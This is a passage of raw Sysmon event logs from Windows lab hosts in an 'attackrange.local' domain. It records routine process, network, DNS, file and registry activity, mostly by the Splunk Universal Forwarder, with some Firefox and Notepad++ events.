Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053174Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:53.489{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053173Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:53.489{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053172Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:53.489{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F769-60EB-C87D-00000000CF01}1148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053171Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:53.475{466BC892-F769-60EB-C87D-00000000CF01}1148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000809678Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:51.220{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57413-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001053198Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:54.757{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3AE4B0BE5142024F66353B010EFBF9A,SHA256=33D0A763B58E4B9F1F63DC3F49990EA681264A6CEBF62296118C04294432442C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809680Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:54.354{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A4207E7E433BD1D0161F166EC5D80A9,SHA256=C6665E4650612D9DF7BF009B77F80160BA70FB53B68521CD9B5C6DDE137030AE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053197Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:46.658{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61909-false10.0.1.12-8000- 354300x80000000000000001053196Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:46.448{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61908-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001053195Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:46.448{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61908-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001053194Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:46.440{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61907-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001053193Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:46.440{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61907-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001053192Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:46.420{466BC892-02AF-60E8-0D00-00000000CF01}900C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61906-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 354300x80000000000000001053191Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:46.420{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61906-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 23542300x80000000000000001053190Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:54.589{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\axpgvkas.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053189Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:54.173{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F76A-60EB-C97D-00000000CF01}8484C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053188Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:54.173{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053187Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:54.173{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053186Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:54.173{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053185Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:54.173{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053184Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:54.173{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F76A-60EB-C97D-00000000CF01}8484C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053183Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:54.173{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F76A-60EB-C97D-00000000CF01}8484C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053182Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:54.129{466BC892-F76A-60EB-C97D-00000000CF01}8484C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000001053208Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:54.106{466BC892-3152-60E8-240B-00000000CF01}3328d2nxq2uap88usk.cloudfront.net02600:9000:2156:3e00:a:da5e:7900:93a1;2600:9000:2156:5000:a:da5e:7900:93a1;2600:9000:2156:2600:a:da5e:7900:93a1;2600:9000:2156:4200:a:da5e:7900:93a1;2600:9000:2156:9600:a:da5e:7900:93a1;2600:9000:2156:5600:a:da5e:7900:93a1;2600:9000:2156:5a00:a:da5e:7900:93a1;2600:9000:2156:9400:a:da5e:7900:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x80000000000000001053207Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:54.102{466BC892-3152-60E8-240B-00000000CF01}3328d2nxq2uap88usk.cloudfront.net013.32.25.69;13.32.25.81;13.32.25.96;13.32.25.34;C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001053206Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:55.772{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81AFFF26832A3E9915E68B8A1389945B,SHA256=456C5EF90C29812CAD4F73EB3DAA3607723CEF5957CF1D5DABF3C68855D1B1D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809681Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:55.373{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1412ACE3C180A00558063EEFCDF12AE,SHA256=929AE0050EB03E0716B7309D3B2D4F294CCC02616E7C898B3E732BC0DCA1936F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053205Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:47.641{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local58271- 354300x80000000000000001053204Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:47.640{466BC892-3152-60E8-240B-00000000CF01}3328C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-890.attackrange.local61911-false13.32.25.34server-13-32-25-34.fra56.r.cloudfront.net443https 354300x80000000000000001053203Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:47.637{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local58233- 354300x80000000000000001053202Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:47.584{466BC892-3152-60E8-240B-00000000CF01}3328C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-890.attackrange.local61910-false143.204.205.100server-143-204-205-100.fra53.r.cloudfront.net443https 23542300x80000000000000001053201Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:55.641{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\axpgvkas.default-release\broadcast-listeners.jsonMD5=E31DDAC0F78D87A5E4FA70F31042EDF1,SHA256=4F65E04348C667AABB7FA1085CF8A78D4D8DDAB4F4E50F166A79CE65C9CBC630,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053200Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:47.580{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local58173- 23542300x80000000000000001053199Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:55.142{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1AEE706635B746021A5B11074BD3AD04,SHA256=E56A9E4D878F91050E2316E9D359947F7CFDDC8340459371F72B58386A000C99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053210Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:56.807{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9C6C33FA01323DD8C8557859326A4B2,SHA256=D26627BB3EDB1E7D977E9A9DF3CF6A0579CD992553800AEC5CA7FC5D676D895A,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000809683Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:03:56.498{0C1E0330-0490-60E8-1100-00000000D001}988C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d776f4-0x769f99f9) 23542300x8000000000000000809682Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:56.389{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06970DD7520CDD894F5A46F9D270FEB2,SHA256=067EC3E3CDEB590365BAC82AC60B97C523D7E9DAB55B7E6076C7497BF1849C37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053209Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:56.725{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\session.xmlMD5=E747D09FC4640EA6371929B491482828,SHA256=7243104DF508A1B1A80997DDC3121C7553B52140AD693367390E6AEA79DB6128,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053212Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:57.824{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=447A9BA6288B307071A79E09C14BE413,SHA256=046D353137A4B7FC0309745AD6D721384096E561C10BCD0D4632A21A539BFEF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809684Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:57.404{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DE5123E487AA24E4A60851134B3DB7E,SHA256=917E33143094B36329CC0BD31857DF595C61E2A10B092DB965EE0E4474008018,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053211Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:57.271{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053214Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:58.824{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E2A898BEEF8F462D0EC2AB232C994EE,SHA256=B4F5E8A6B2CEFBAA2460825F34ECB9778ABF46C6AECB7B6F0B75A69A2F18C140,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809686Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:58.407{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E7C448728C51975093D8DAB8562E22E,SHA256=B385336F3B67CE7A968B28203BD89927291194E6C8E068F5B5FDCB8D4E4B9C59,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053213Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.802{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61912-false10.0.1.12-8089- 354300x8000000000000000809685Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:56.365{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57414-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001053225Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:59.824{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 